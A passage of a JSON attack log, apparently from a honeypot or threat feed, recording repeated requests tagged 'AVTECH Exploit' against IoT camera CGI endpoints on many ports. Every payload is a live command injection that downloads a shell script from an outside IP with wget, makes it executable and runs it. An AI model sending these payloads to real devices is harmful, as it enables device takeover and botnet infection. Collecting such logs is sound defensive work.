- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:45:23Z",
- "last_seen": "2020-06-01T05:45:23Z"
- },
- {
- "event_id": "ba01391da3cb191b4679dcb16de977e0de50418852e8eb0e7f2bf4c34b0bc5a6",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 2480,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:45:22Z",
- "last_seen": "2020-06-01T05:45:22Z"
- },
- {
- "event_id": "662d06408fd6b1f4f1259f18f019364e6d76d2b7003e5991b4e01bd59439ec2f",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:45:20Z",
- "last_seen": "2020-06-01T05:45:20Z"
- },
- {
- "event_id": "c103369e84a5e346d71fa1c0a2f6ee1e09ab4e379372c7261e1a434c0cd9a563",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 4242,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:45:15Z",
- "last_seen": "2020-06-01T05:45:15Z"
- },
- {
- "event_id": "1161e89cb6883518d2c135c1a585b61b531dd8d1377d26911bb223aa29a4f158",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 2480,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:45:14Z",
- "last_seen": "2020-06-01T05:45:14Z"
- },
- {
- "event_id": "b231ee200b361ae70f5062eae618c1cb41d4c31e9eb78099c15e079b7ddc6a05",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 6511,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:45:14Z",
- "last_seen": "2020-06-01T05:45:14Z"
- },
- {
- "event_id": "7cf11168cee6cbd54eecaaff3ad771bc9a6b41db5a6ff0908b85d243af583443",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:45:12Z",
- "last_seen": "2020-06-01T05:45:12Z"
- },
- {
- "event_id": "f0b182c190e74e2c199db3535427b4420abd10f3de20077edb5e0e84b1c3551e",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 6511,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:45:06Z",
- "last_seen": "2020-06-01T05:45:06Z"
- },
- {
- "event_id": "1ec55e1b56163ec36393dedde9c1bcb5dc9fff90eaa363eaf8615f87fc110a8e",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:44:09Z",
- "last_seen": "2020-06-01T05:44:59Z"
- },
- {
- "event_id": "8e012bf46d2a4a2abcfeda43973ced6f88b34c025d9165f4c10e1a1e64a6b63c",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 5001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:44:58Z",
- "last_seen": "2020-06-01T05:44:58Z"
- },
- {
- "event_id": "859ad4fce9c90c1ebd2d8270a8ec6be245e74c407a4bca3a945c0783ebbbc320",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:44:02Z",
- "last_seen": "2020-06-01T05:44:51Z"
- },
- {
- "event_id": "5ece2229e8f2215c582f182485e8d3e201df49bdcf8b657cb2704b744840d6e1",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 5001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:44:49Z",
- "last_seen": "2020-06-01T05:44:49Z"
- },
- {
- "event_id": "5f4be9346625d67853f7e789a5c9eb7d46face509c854f456635ca81473a453e",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9002,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:44:39Z",
- "last_seen": "2020-06-01T05:44:39Z"
- },
- {
- "event_id": "cf21c55e071832fd9de69e8d5b767d09a5f40114731b615a38027b26e65b6f7e",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:44:36Z",
- "last_seen": "2020-06-01T05:44:36Z"
- },
- {
- "event_id": "b229ad09239529805d582c9ee14d24e1518cd8cb834373ea7ebbb823ffbb95e9",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9200,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:44:32Z",
- "last_seen": "2020-06-01T05:44:32Z"
- },
- {
- "event_id": "ab3a242b4a56a7b65ee675e57a6594a6bb81a75ae3ed670715baccb6866ade1e",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9002,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:44:31Z",
- "last_seen": "2020-06-01T05:44:31Z"
- },
- {
- "event_id": "ae7dbb5456509a7f57ab33f1ed317b1fa98641f53eb727579c84a3d1ca62d4dd",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:44:29Z",
- "last_seen": "2020-06-01T05:44:29Z"
- },
- {
- "event_id": "ae60c76aae428a51720a703b5a014e2994acc760f8ea13f06112451407d0b38b",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9200,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:44:24Z",
- "last_seen": "2020-06-01T05:44:24Z"
- },
- {
- "event_id": "1a8bb257dc92febe557a59cf5ba1cedf72f1c536b6a27548aa24547a0463ac3b",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8843,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:36:43Z",
- "last_seen": "2020-06-01T05:36:43Z"
- },
- {
- "event_id": "3df3f83cbfac3eb99897de01c61b3238d2090353c5a06341dc3cf2e9c7fd261f",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8843,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:36:37Z",
- "last_seen": "2020-06-01T05:36:37Z"
- },
- {
- "event_id": "74e2742a32b7ded053c2b0634aacdbc340217877cf78ac6cd6590cf1e90c1c82",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 5222,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:23:15Z",
- "last_seen": "2020-06-01T05:36:29Z"
- },
- {
- "event_id": "aa5f86d1d2d810d9ea8f1c2e3f55838d2ed433f5d597782fa4f702da7184fce4",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 5222,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:23:01Z",
- "last_seen": "2020-06-01T05:36:23Z"
- },
- {
- "event_id": "daf80a2aa7d2c1f6a6d2c3679a955675e5026d0f6867c95364ea482b59cdb6ed",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 16993,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:07:04Z",
- "last_seen": "2020-06-01T05:35:51Z"
- },
- {
- "event_id": "95704a3507aec8d164989d316765225922444160d602e6308f46a6288f8fbbf6",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 16993,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:06:56Z",
- "last_seen": "2020-06-01T05:35:45Z"
- },
- {
- "event_id": "73659f5cdfc354283121c3e221d9c5e7c7b862d31bcf9896d963f60b4adb74be",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 3105,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:27:28Z",
- "last_seen": "2020-06-01T05:34:48Z"
- },
- {
- "event_id": "11427ae986267fa3fa48afc0f9f67e89026d14fac4c8b0e2a607f9ff4678651b",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 3105,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:27:21Z",
- "last_seen": "2020-06-01T05:34:43Z"
- },
- {
- "event_id": "1fdd7968a2853ca1947240c17ee720cc515ee6ab9dc400e9d7e9183c2e9e5903",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8139,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T05:01:15Z",
- "last_seen": "2020-06-01T05:34:35Z"
- },
- {
- "event_id": "851ee6af0942ef0a985e243b3eb0a1eecf69ab20fab7fa6a82e942247f5a6149",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8139,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T05:01:07Z",
- "last_seen": "2020-06-01T05:34:29Z"
- },
- {
- "event_id": "06a27b976880420e50e58b0e78f23b6b2a7f228d4bff638df737e4c4cfa049be",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 37777,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T05:12:20Z",
- "last_seen": "2020-06-01T05:33:59Z"
- },
- {
- "event_id": "700dbb2c4b22690a4a37e53e5dd5b8d24527290805888034bbf4bbbca25eb1f2",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 37777,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T05:12:11Z",
- "last_seen": "2020-06-01T05:33:54Z"
- },
- {
- "event_id": "6538e4ac4bfe72c949c61d277a487c85af3e97dfd6531ad9fe7b05932dc3bbc6",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8095,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T05:25:30Z",
- "last_seen": "2020-06-01T05:32:20Z"
- },
- {
- "event_id": "9795aba138df0280f1278f4e4d79e2ddc750549423bdbca5eecdece3ef5cb654",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8095,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T05:25:22Z",
- "last_seen": "2020-06-01T05:32:14Z"
- },
- {
- "event_id": "550cb6969c2c29465d0e84d5ed735e9700fe5266f6065c353284ea7a51fa3446",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8791,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T05:14:56Z",
- "last_seen": "2020-06-01T05:32:00Z"
- },
- {
- "event_id": "85e4ed3c7716c60799d38a5a777a650ecfbb879c0b8a0c803befd0599fad83bb",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 5269,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:19:08Z",
- "last_seen": "2020-06-01T05:31:59Z"
- },
- {
- "event_id": "7c6d5fd4615f186cedb1e647796b8899cecdaa51588b6d0fbf1e89de7bc9def7",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 5269,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T05:19:01Z",
- "last_seen": "2020-06-01T05:31:54Z"
- },
- {
- "event_id": "60c7a6bc3503f271eb02ceec1478c794387085f5b7730d7ee480ac9f4a1d28c3",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8791,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-01T05:14:49Z",
- "last_seen": "2020-06-01T05:31:54Z"
- },
- {
- "event_id": "ac8437dfd66429178daabecb191d3627cf1f5cce9f9a4a0a5aa0a57dbadf8496",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8888,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 5,
- "first_seen": "2020-06-01T05:00:27Z",
- "last_seen": "2020-06-01T05:31:52Z"
- },
- {
- "event_id": "2b407ce19020fea1e0aa41fe8373617bc9b855e52611313c3e9321da73efc22d",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8888,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 5,
- "first_seen": "2020-06-01T05:00:21Z",
- "last_seen": "2020-06-01T05:31:47Z"
- },
- {
- "event_id": "d45973ea0055018f8f85b929a4ef827e7c9e7f7a92590e0bdf653c2e784c25cf",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 10000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-06-01T05:18:22Z",
- "last_seen": "2020-06-01T05:31:01Z"
- },
- {
- "event_id": "58579cfc4ab75e71d0c34fa6daec768e46a6c50b73e2b255e9c000727c0936ae",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
